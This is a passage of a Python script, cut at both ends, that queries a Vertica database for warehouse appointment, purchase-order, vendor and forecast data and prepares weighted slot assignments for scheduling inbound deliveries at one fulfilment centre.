logging.handlers.RotatingFileHandler('ISO_process.log',maxBytes = 500*1024,backupCount = 1)\r\n rh.setLevel(logging.DEBUG)\r\n ch = logging.StreamHandler()\r\n ch.setLevel(logging.DEBUG)\r\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')\r\n rh.setFormatter(formatter)\r\n ch.setFormatter(formatter)\r\n if (logger.hasHandlers()):\r\n logger.handlers.clear()\r\n logger.addHandler(rh)\r\n logger.addHandler(ch)\r\n today = dtm.datetime.today().date()\r\n for i in range(1,108):\r\n a = today + dtm.timedelta(days = i-15)\r\n if a.weekday() == 4:\r\n date_fl[str(a)] = '1'\r\n elif a.weekday() in [0,1,2,3]:\r\n date_fl[str(a)] = '0'\r\n else:\r\n pass\r\n \r\n #giving slots \r\n day_slots={'0': ['05:30:00','06:00:00','06:30:00','07:30:00','08:00:00','08:30:00','09:00:00','09:30:00','10:00:00','11:00:00'],\r\n '1':['05:30:00','06:00:00','06:30:00','07:00:00','07:30:00','08:00:00','08:30:00','09:00:00','10:00:00','11:00:00','12:00:00','12:30:00','13:00:00','13:30:00','14:00:00','15:00:00','15:30:00','16:00:00']}\r\n night_slots={'0':['16:00:00','16:30:00','17:00:00','17:30:00','19:00:00','19:30:00','20:00:00','20:30:00'],\r\n '1':[]}\r\n cxn = pyodbc.connect(\"DSN=BIDB\",autocommit = True)\r\n cur = cxn.cursor()\r\n logger.info(\"Vertica is Connected\")\r\n std_no = {\r\n ('9011','16:30:00') : '271',\r\n ('9000','06:30:00') : '266',\r\n ('9000','17:00:00') : '376',\r\n ('9282','06:30:00') : '329',\r\n ('9282','09:00:00') : '325',\r\n ('9283','08:00:00') : '327',\r\n ('9283','09:00:00') : '372',\r\n ('9285','07:30:00') : '273',\r\n ('000000012','09:00:00') : '640',\r\n ('00000002','22:45:00') : '369',\r\n ('00000004','10:00:00') : '602',\r\n ('00000007','21:45:00') : '368'\r\n }\r\n #Sch_units, Sch_SKU and Sch_appt at day level\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, SUM(pdp.qty) AS IB_units, 
COUNT(pdp.item_number) AS SKU, COUNT(DISTINCT apl.appointment_id) AS slots\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pdp.po_number = pol.po_number\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE > current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1\r\n ORDER BY 1\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['date','U','S','Sl']\r\n sch_dict = dict([str(i),[int(j),int(k),int(l)]] for i,j,k,l in zip(df.date,df.U,df.S,df.Sl))\r\n #Sch_appt at slot level\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, apl.request_time:: TIME,COUNT(DISTINCT apl.appointment_id) AS slots\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE > current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1,2\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','t','s']\r\n sch_slot = dict([(str(i),str(j)),int(k)] for i,j,k in zip(df.dt,df.t,df.s))\r\n \r\n #Sch_units, Sch_SKU and Sch_appt at day and shift level\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE,CASE WHEN apl.request_time:: TIME BETWEEN '04:00:00' AND '14:30:00' THEN 1 ELSE 2 END AS shift, SUM(pdp.qty) AS IB_units, COUNT(DISTINCT pdp.item_number) AS SKU, COUNT(DISTINCT apl.appointment_id) AS slots\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pdp.po_number = pol.po_number\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE > current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1,2\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','sh','u','s','sl']\r\n sch_sh = dict([(str(i),str(j)),[int(k),int(l),int(m)]] for i,j,k,l,m in zip(df.dt,df.sh,df.u,df.s,df.sl))\r\n logger.info(\"HJ data are collected\")\r\n \r\n #Getting S&OP forecast\r\n query = \"\"\"\r\n with FC_max_date as\r\n (\r\n select distinct date::date,wh_id,max(scrape_update_dttm) as max_date \r\n from sandbox_fulfillment.t_labor_model_inbound_forward_looking_capacity_new \r\n --where date::date = scrape_update_dttm::date + 14 --rolling 14 day lock\r\n --date_trunc('week',date::date+1)-1 = timestampadd('week',2,date_trunc('week',scrape_update_dttm+1)-1) --2 week lock\r\n group by 1,2\r\n )\r\n select iblm.wh_id,iblm.scrape_update_dttm,iblm.date::date as date,\r\n ROUND(abs(iblm.planned_operations_units_received),0) AS planned_operations_units_received ,\r\n ROUND(abs(iblm.planned_operations_units_received),0)-ROUND(abs(iblm.planned_units_received_nights),0) as planned_units_received_days,\r\n ROUND(abs(iblm.planned_units_received_nights),0) AS planned_units_received_nights \r\n from sandbox_fulfillment.t_labor_model_inbound_forward_looking_capacity_new iblm\r\n join FC_max_date fmd on iblm.scrape_update_dttm = fmd.max_date and iblm.wh_id = fmd.wh_id and iblm.date::date = fmd.date\r\n where iblm.date::date >= current_date AND iblm.wh_id = 'DFW1'\r\n order by wh_id, date;\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['fc_nm','update_dttm','date','units','day_units','night_units']\r\n f = dict([str(i),[float(j),float(k)]] for i,j,k in 
zip(df.date,df.day_units,df.night_units))\r\n \r\n# =============================================================================\r\n# query = \"\"\"\r\n# SELECT common_date_dttm, forecast_percent\r\n# FROM sandbox_supply_chain.daily_inbound_forecast_percent\r\n# WHERE common_date_dttm between current_date-7 and current_date+123 AND location = 'DFW1'\r\n# ORDER BY 1\r\n# \"\"\"\r\n# #cur.execute(query)\r\n# #result = cur.fetchall()\r\n# #df = pd.DataFrame(data = result)\r\n# df = pd.read_sql(query,cxn)\r\n# df.columns = ['date','units']\r\n# temp_perc = dict([i,float(j)] for i,j in zip(df.date,df.units))\r\n# f = {}\r\n# f_sch = {}\r\n# for i in temp_f.keys():\r\n# k = 0\r\n# while k < 5:\r\n# a = i + dtm.timedelta(days = k+1)\r\n# if a in temp_perc:\r\n# f[str(a)] = temp_perc[a] * temp_f[i]\r\n# else:\r\n# f[str(a)] = 0.2* temp_f[i]\r\n# k = k+1\r\n# =============================================================================\r\n logger.info(\"Forecast data is collected\") \r\n\r\n \r\n cnt = 1\r\n for i in range(1,108):\r\n a = today + dtm.timedelta(days = i-1)\r\n if 1 <= cnt <= 3:\r\n if str(a) in f:\r\n f[str(a)][0] = 1 * f[str(a)][0]\r\n f[str(a)][1] = 1 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n \r\n elif 4 <= cnt <= 6:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.9 * f[str(a)][0]\r\n f[str(a)][1] = 0.9 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 7 <= cnt <= 9:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.8 * f[str(a)][0]\r\n f[str(a)][1] = 0.8 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 10 <= cnt <= 12:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.7 * f[str(a)][0]\r\n f[str(a)][1] = 0.7 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 13 <= cnt <= 15:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.6 * f[str(a)][0]\r\n f[str(a)][1] = 0.6 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n elif 16 <= cnt <= 18:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.5 * f[str(a)][0]\r\n f[str(a)][1] = 0.5 * f[str(a)][1]\r\n cnt = cnt + 1\r\n else:\r\n pass\r\n else:\r\n if str(a) in f:\r\n f[str(a)][0] = 0.4 * f[str(a)][0]\r\n f[str(a)][1] = 0.4 * f[str(a)][1]\r\n else:\r\n pass\r\n logger.info(\"Added Dynamic weights to the S&OP forecast\")\r\n \r\n #getting vas_units\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, sum(pdp.qty)\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n JOIN chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number\r\n WHERE apl.wh_id = 'DFW1' AND apl.status <> 'Cancelled' AND p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') AND apl.request_date:: DATE >= current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1\r\n ORDER BY 1\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['date','vas_units']\r\n sch_vas = dict([str(i),int(j)] for i,j in zip(df.date,df.vas_units))\r\n \r\n vas_dt = []\r\n \r\n for i in sch_vas.keys():\r\n if sch_vas[i] > 6000:\r\n vas_dt.append(i)\r\n else:\r\n pass\r\n \r\n #getting vas units by shift\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE,CASE WHEN apl.request_time:: TIME BETWEEN '04:00:00' AND '14:30:00' THEN 1 ELSE 2 END AS shift, SUM(pdp.qty) AS vas_units\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n JOIN 
chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number\r\n WHERE apl.wh_id = 'DFW1' AND apl.status <> 'Cancelled' AND p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') AND apl.request_date:: DATE >= current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n GROUP BY 1,2\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['dt','sh','vas_units']\r\n sch_vas_sh = dict([(str(i),str(j)),float(k)] for i,j,k in zip(df.dt,df.sh,df.vas_units))\r\n \r\n for (i,j) in sch_vas_sh.keys():\r\n if sch_vas_sh[(i,j)] > 3000:\r\n vas_dt.append((i,j))\r\n else:\r\n pass\r\n #getting and initializing vas slot\r\n query = \"\"\"\r\n SELECT DISTINCT apl.request_date:: DATE,request_time:: TIME, CASE WHEN p.product_vas_profile_description IN ('SHRINKWRAP') THEN 1 ELSE 0 END vas_slot\r\n FROM aad.t_appt_appointment_log AS apl\r\n LEFT JOIN aad.t_appt_appointment_log_po AS pol\r\n USING(appointment_id)\r\n LEFT JOIN aad.t_po_detail AS pdp\r\n ON pol.po_number = pdp.po_number\r\n LEFT JOIN chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number\r\n WHERE apl.wh_id = 'DFW1' AND apl.status <> 'Cancelled' AND p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') AND apl.request_date:: DATE >= current_date and dayofweek(apl.request_date:: DATE) NOT IN (6,7)\r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['date','time','vas_flag']\r\n sch_vas_fl = dict([(str(i),str(j)),str(k)] for i,j,k in zip(df.date,df.time,df.vas_flag))\r\n \r\n temp_fl = sch_vas_fl.copy()\r\n for (i,j) in temp_fl.keys():\r\n gh = 0\r\n for k in sorted(day_slots[date_fl[i]]):\r\n if j == k and temp_fl[(i,j)] == '1' and gh != 0 and gh != len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(day_slots[date_fl[i]]):\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(day_slots[date_fl[i]]):\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == len(day_slots[date_fl[i]])-1:\r\n w = gh-1\r\n sch_vas_fl[(i,day_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n \r\n for (i,j) in temp_fl.keys():\r\n gh = 0\r\n if date_fl[i] == '0':\r\n for k in sorted(night_slots[date_fl[i]]):\r\n if j == k and temp_fl[(i,j)] == '1' and gh != 0 and gh != len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n if w < len(night_slots[date_fl[i]]):\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n w = gh+1\r\n if w < len(night_slots[date_fl[i]]):\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == 0:\r\n w = gh+1\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n elif j == k and temp_fl[(i,j)] == '1' and gh == len(night_slots[date_fl[i]])-1:\r\n w = gh-1\r\n sch_vas_fl[(i,night_slots[date_fl[i]][w])] = '2'\r\n else:\r\n pass\r\n gh = gh+1\r\n else:\r\n pass\r\n logger.info(\"VAS data is collected and slots are initialized\") \r\n #getting input data from carrier portal\r\n query = \"\"\"\r\n WITH data2 AS \r\n (\r\n SELECT cpl.PO_no AS document_number,MAX(cpl.Ref_no) AS reference_number , MAX(cpl.VRDD:: DATE) AS requested_appt_date , MAX(cpl.Created_dt) AS created_dttm\r\n FROM sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n WHERE cpl.FC_nm = 'DFW1' AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM 
sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n AND cpl.Ref_no NOT IN (SELECT Ref_no FROM sandbox_supply_chain.iso_exception)\r\n AND cpl.Ref_no <> '190922-029070'\r\n GROUP BY 1\r\n )\r\n ,data AS\r\n (\r\n SELECT d1.reference_number AS Ref_no, CASE WHEN DAYOFWEEK(d1.requested_appt_date) = 7 THEN d1.requested_appt_date+2 WHEN DAYOFWEEK(d1.requested_appt_date) = 1 THEN d1.requested_appt_date+1 ELSE d1.requested_appt_date END AS VRDD1, d1.document_number AS PO_no,d1.created_dttm AS cr_dt,cpl.carrier_scac AS sc,cpl.carrier_name AS csr\r\n FROM data2 AS d1\r\n JOIN sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n ON d1.reference_number = cpl.Ref_no AND cpl.PO_no = d1.document_number\r\n )\r\n , parameters AS\r\n (\r\n SELECT d.Ref_no, SUM(pdp.qty) AS IB_units, COUNT(DISTINCT pdp.item_number) AS sku, \r\n CASE\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 61 THEN 1\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 51 THEN 2\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 41 THEN 3\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) > 21 THEN 4\r\n WHEN (SUM(pdp.qty)/COUNT(DISTINCT pdp.item_number)) <= 21 THEN 5\r\n END as high_jump_rank,COUNT(DISTINCT pdp.po_number) AS po_count \r\n FROM data AS d\r\n JOIN aad.t_po_detail AS pdp\r\n ON d.PO_no = pdp.po_number\r\n GROUP BY 1\r\n )\r\n ,obj1 AS \r\n (\r\n SELECT d.Ref_no, AVG(DATEDIFF(day,pdpm.document_original_requested_delivery_dttm,d.VRDD1)) AS obj\r\n FROM data AS d\r\n JOIN chewybi.procurement_document_product_measures AS pdpm\r\n ON d.PO_no = pdpm.document_number\r\n GROUP BY 1\r\n ) \r\n ,obj AS \r\n (\r\n SELECT Ref_no, CASE WHEN obj IS NULL THEN 0 ELSE obj END AS obj\r\n FROM obj1\r\n )\r\n ,vas_parameters AS\r\n (\r\n SELECT d.Ref_no,sum(pdp.qty) AS vas_units\r\n FROM data AS d\r\n JOIN aad.t_po_detail AS pdp\r\n ON d.PO_no = pdp.po_number\r\n JOIN chewybi.products AS p\r\n ON pdp.item_number = p.product_part_number \r\n WHERE p.product_merch_classification2 = 'Litter' AND p.product_vas_profile_description IN ('SHRINKWRAP') \r\n GROUP BY 1\r\n )\r\n \r\n ,cont_flag AS\r\n (\r\n SELECT DISTINCT d.Ref_no, d.VRDD1,\r\n CASE WHEN v.vendor_number IN ('P000533','B000050','1760','9295','9302','P000544','P000508','P000486','P000400','7701','P000398','B000064','P000421','P000476','3755','3722','8038','5223') THEN 3\r\n ELSE NULL \r\n END AS cont_flag\r\n FROM data AS d\r\n JOIN chewybi.procurement_document_measures AS pdm\r\n ON d.PO_no = pdm.document_number\r\n JOIN chewybi.vendors AS v\r\n USING (vendor_key)\r\n )\r\n ,cont_fl AS\r\n (\r\n SELECT * , ROW_NUMBER() OVER (PARTITION BY VRDD1) AS rank\r\n FROM cont_flag\r\n WHERE cont_flag IS NOT NULL\r\n )\r\n ,stand_appt AS\r\n (\r\n SELECT DISTINCT d.Ref_no,d.PO_no,d.VRDD1,d.cr_dt,\r\n CASE WHEN LOWER(d.csr) LIKE 'estes%' THEN '000000012'\r\n WHEN LOWER(d.csr) LIKE 'yrc%' THEN '00000007'\r\n WHEN LOWER(d.csr) LIKE 'saia%' THEN '00000004'\r\n WHEN LOWER(d.csr) LIKE 'fedex%' THEN '9000'\r\n WHEN LOWER(d.csr) LIKE 'ups%' THEN '00000002'\r\n ELSE v.vendor_number END as vendor_number ,v.vendor_name\r\n FROM data AS d\r\n JOIN chewybi.procurement_document_measures AS pdm\r\n ON d.PO_no = pdm.document_number\r\n JOIN chewybi.vendors AS v\r\n ON pdm.vendor_key = v.vendor_key\r\n )\r\n ,stand_slot AS\r\n (\r\n SELECT Ref_no,PO_no, VRDD1,vendor_number,cr_dt, ROW_NUMBER() OVER(PARTITION BY VRDD1,vendor_number) AS rank\r\n FROM stand_appt\r\n WHERE stand_flag = 1\r\n ORDER BY 
VRDD1\r\n )\r\n ,vas_final AS \r\n (\r\n SELECT d.Ref_no, CASE WHEN vp.vas_units IS NULL THEN 0 ELSE vp.vas_units END AS vas_units\r\n FROM data AS d\r\n LEFT JOIN vas_parameters AS vp\r\n ON vp.Ref_no = d.Ref_no\r\n ) \r\n SELECT d.Ref_no,d.VRDD1 AS VRDD, \r\n CASE WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (2,3,4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) = 1 AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj + 1 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) = 7 AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj+2 AS DATE) ELSE CAST(d.VRDD1 AS DATE) END AS VRDD1, \r\n CASE WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (3,4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-1 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (2,7,1) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-3 AS DATE) \r\n WHEN p1.obj >= -1 AND DAYOFWEEK(d.VRDD1) = 6 AND c.cont_flag IS NULL THEN CAST(d.VRDD1+3 AS DATE) \r\n WHEN c.cont_flag IS NOT NULL AND DAYOFWEEK(d.VRDD1) = 6 THEN CAST(d.VRDD1+3 AS DATE) ELSE CAST(d.VRDD1+1 AS DATE) END AS VRDD2,\r\n CASE WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) <> 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-2 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) <> 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (1,2,3,7) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-4 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) = 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (4,5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-2 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) = 6 AND DAYOFWEEK(d.VRDD1-p1.obj) IN (1,3,7) AND c.cont_flag IS NULL THEN CAST(d.VRDD1-p1.obj-4 AS DATE) \r\n WHEN p1.obj < -1 AND DAYOFWEEK(d.VRDD1) = 6 AND c.cont_flag IS NULL AND DAYOFWEEK(d.VRDD1-p1.obj) IN (2) THEN CAST(d.VRDD1+4 AS DATE)\r\n WHEN p1.obj >= -1 AND DAYOFWEEK(d.VRDD1) IN (5,6) AND c.cont_flag IS NULL THEN CAST(d.VRDD1+4 AS DATE) \r\n WHEN c.cont_flag IS NOT NULL AND DAYOFWEEK(d.VRDD1) IN (5,6) THEN CAST(d.VRDD1+4 AS DATE) ELSE CAST(d.VRDD1+2 AS DATE) END AS VRDD3,\r\n p.IB_units, p.sku,p1.obj, p.high_jump_rank,c.cont_flag,\r\n CASE WHEN c.cont_flag IS NULL AND p.po_count <= 1 AND p.high_jump_rank IN (1,2,3,4) THEN 0 ELSE 1 END AS UPT,d.cr_dt,sa.vendor_number,sa.vendor_name,vl.vas_units\r\n ,CASE WHEN vl.vas_units > 0 THEN 1 ELSE 0 END AS vas_flag,d.csr\r\n FROM data AS d\r\n JOIN parameters AS p\r\n ON d.Ref_no = p.Ref_no\r\n JOIN cont_flag AS c\r\n ON p.Ref_no = c.Ref_no\r\n JOIN stand_appt AS sa\r\n ON c.Ref_no = sa.Ref_no and d.PO_no = sa.PO_no\r\n JOIN obj AS p1\r\n ON p1.Ref_no = d.Ref_no\r\n LEFT JOIN vas_final AS vl\r\n ON vl.Ref_no = d.Ref_no;\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['appt_id','vrdd','vrdd1','vrdd2','vrdd3','units','sku','obj','high_jump_rank','con_fl','upt','cr_dt','vendor','vendor_name','vas_units','vas_flag','carrier_name']\r\n dt1 = dict([(str(i),[str(j),str(k),str(l)]) for i,j,k,l in zip(df.appt_id,df.vrdd1,df.vrdd2,df.vrdd3)])\r\n #st_fl = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.st_fl))\r\n cont_fl = {str(k):g['appt_id'] for k,g in df.groupby('con_fl')}\r\n cnt_fl = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.con_fl))\r\n vendor = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.vendor))\r\n units_sku_obj = dict([(str(i),[int(j),int(k),float(l)]) for i,j,k,l in zip(df.appt_id,df.units,df.sku,df.obj)])\r\n b = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.upt))\r\n cr_dt = 
dict([str(i),str(j)] for i,j in zip(df.appt_id,df.cr_dt))\r\n v_name = dict([str(i),str(j).replace(',',';')] for i,j in zip(df.appt_id,df.vendor_name))\r\n vas_units = dict([str(i),int(j)] for i,j in zip(df.appt_id,df.vas_units))\r\n vas_flag = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.vas_flag))\r\n hj_rank = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.high_jump_rank))\r\n csr = dict([str(i),str(j).replace(',',';')] for i,j in zip(df.appt_id,df.carrier_name))\r\n vrdd = dict([str(i),str(j)] for i,j in zip(df.appt_id,df.vrdd))\r\n logger.info(\"Getting Carrier Portal Data\")\r\n date = str(dtm.datetime.today().date())\r\n dt = {}\r\n for i in dt1.keys():\r\n cnt = 0 \r\n for j in dt1[i]:\r\n if j < date:\r\n pass\r\n else:\r\n if i in dt:\r\n dt[i].append(j)\r\n else:\r\n dt[i] = [j]\r\n \r\n #po_number\r\n query = \"\"\"\r\n SELECT cpl.Ref_no,pdp.po_number, SUM(pdp.qty), COUNT(DISTINCT pdp.item_number)\r\n FROM sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n JOIN aad.t_po_detail AS pdp\r\n ON cpl.PO_no = pdp.po_number\r\n WHERE cpl.FC_nm = 'DFW1' AND UPPER(cpl.request_type) LIKE 'CREATE%' AND cpl.VRDD:: DATE >= '20190701' AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n GROUP BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['ref','po','units','sku']\r\n ref_num = {str(k):g['po'].unique().tolist()for k,g in df.groupby('ref')}\r\n po = dict([(str(i),str(j)),[int(k),int(l)]] for i,j,k,l in zip(df.ref,df.po,df.units,df.sku))\r\n \r\n query = \"\"\"\r\n SELECT cpl.Incident_No,cpl.Ref_no,pdp.document_number,ISNULL(pdp.document_original_requested_delivery_dttm:: DATE,'1900-01-01')\r\n FROM sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n JOIN chewybi.procurement_document_measures AS pdp\r\n ON cpl.PO_no = pdp.document_number\r\n WHERE cpl.FC_nm = 'DFW1' AND UPPER(cpl.request_type) LIKE 'CREATE%' AND cpl.VRDD:: DATE >= '20190701' AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n ORDER BY 1,2\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n df.columns = ['inc','ref','po','ordd']\r\n ordd = dict([str(i),str(j)] for i,j in zip(df.po,df.ordd))\r\n inc = dict([str(i),str(j)] for i,j in zip(df.ref,df.inc))\r\n \r\n logger.info(\"Getting PO details in terms of units,sku and ORDD\")\r\n #cont_appt_scheduled\r\n query = \"\"\"\r\n SELECT apl.request_date:: DATE, COUNT(DISTINCT apl.appointment_id)\r\n FROM aad.t_appt_appointment_log AS apl\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n ON apl.appointment_id = pol.appointment_id\r\n JOIN chewybi.procurement_document_measures AS pdm\r\n ON pol.po_number = pdm.document_number\r\n JOIN chewybi.vendors AS v\r\n ON pdm.vendor_key = v.vendor_key\r\n WHERE apl.wh_id = 'DFW1' AND LOWER(apl.status) <> 'cancelled' AND apl.request_date:: DATE >= '2019-07-01' AND v.vendor_number IN ('P000533','B000050','1760','9295','9302','P000544','P000508','P000486','P000400','7701','P000398','B000064','P000421','P000476','3755','3722','8038','5223')\r\n GROUP BY 1\r\n ORDER BY 1\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n if df.empty == False: \r\n df.columns = ['date','cnt']\r\n cont_appt = dict([str(i),2-int(j)] for i,j in zip(df.date,df.cnt))\r\n else:\r\n cont_appt = {}\r\n logger.info(\"Getting Container appointments data\")\r\n #reschedules\r\n query 
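# The dict(...) comprehensions above all build "id -> column value" lookups from a
# DataFrame. A hypothetical helper covering the same pattern (column names are
# whatever the preceding query produced; `cast` defaults to str, as in the originals):
def column_lookup(df, key_col, val_col, cast=str):
    # Map str(key) -> cast(value) for two columns of df.
    return {str(k): cast(v) for k, v in zip(df[key_col], df[val_col])}
# e.g. vendor = column_lookup(df, 'appt_id', 'vendor')
#      vas_units = column_lookup(df, 'appt_id', 'vas_units', cast=int)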
= \"\"\"\r\n WITH data AS (SELECT cpl.Ref_no, cpl.VRDD:: DATE, cpl.Created_dt:: DATE,pdm.document_number\r\n FROM chewybi.procurement_document_measures AS pdm\r\n JOIN sandbox_supply_chain.carrier_portal_new_test AS cpl\r\n ON cpl.PO_no = pdm.document_number\r\n WHERE cpl.FC_nm = 'DFW1' AND cpl.Ref_no NOT IN (SELECT Ref_no FROM sandbox_supply_chain.iso_exception) AND cpl.Created_dt BETWEEN (SELECT MAX(Created_dt) FROM sandbox_supply_chain.ISO_OUTPUT_NEW WHERE FC_nm = 'DFW1') + INTERVAL '1 SECOND' AND (SELECT current_date - INTERVAL '1 SECOND') \r\n )\r\n SELECT d.Ref_no,apl.appointment_id,apl.request_date:: DATE, request_time:: TIME, d.document_number\r\n FROM data AS d\r\n JOIN aad.t_appt_appointment_log_po AS pol\r\n ON d.document_number = pol.po_number\r\n JOIN aad.t_appt_appointment_log AS apl\r\n ON apl.appointment_id = pol.appointment_id\r\n \"\"\"\r\n df = pd.read_sql(query,cxn)\r\n rsch = {}\r\n if df.empty == False:\r\n df.columns = ['reference_number','appointment_id','Date','Time','PO_number']\r\n rsch = dict([(str(i),str(j)),[str(k),str(l)]] for i,j,k,l in 